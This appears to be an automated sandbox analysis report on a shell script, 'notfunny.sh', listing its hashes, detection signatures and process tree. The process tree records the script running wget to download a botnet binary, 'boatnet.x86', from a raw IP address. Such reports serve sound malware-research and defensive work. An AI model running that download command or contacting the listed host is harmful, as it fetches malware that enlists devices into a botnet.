Analysis

  • max time kernel
    149s
  • max time network
    28s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system
  • submitted
    28/10/2024, 01:18

General

  • Target

    notfunny.sh

  • Size

    3KB

  • MD5

    fc73d6be8e91e575c902e5d3b1834868

  • SHA1

    61880a4da8b19dc7d4d87b5a3d55e0a992aac856

  • SHA256

    9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b

  • SHA512

    1a2710fc7254ed255df6389118929be76e435a66e77f58b6065f2771e235295647a7f6f62e008fa3e2ac6bf0126abef05569dc76542a549b608bf94fd657a9a3

Score
5/10
upx

Malware Config

Signatures

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/notfunny.sh
    /tmp/notfunny.sh
    1⤵
      PID:707
      • /usr/bin/wget
        wget http://154.216.19.166:3000/hiddenbin/boatnet.x86
        2⤵
        • Writes file to tmp directory
        PID:710

    Network

    MITRE ATT&CK Matrix

    Downloads

    • /tmp/boatnet.x86

      Filesize

      19KB

      MD5

      54e076b42cc4c7bc77ed783c93733706

      SHA1

      60142c48cd534ab3069378d73a63c87627efb42b

      SHA256

      fbc7b2a7d16b78fc5360b2709692ae863466577e3fd0de5e4245cc2432d33a13

      SHA512

      cabea678a945078356c35a68a2cab192bbb6ceb1c47ca05e9f3b519be4832bdd8ab6d78226617cf5de4b4f19097dcb9ebf142c7259234bd2c6f6118c7adaaa2a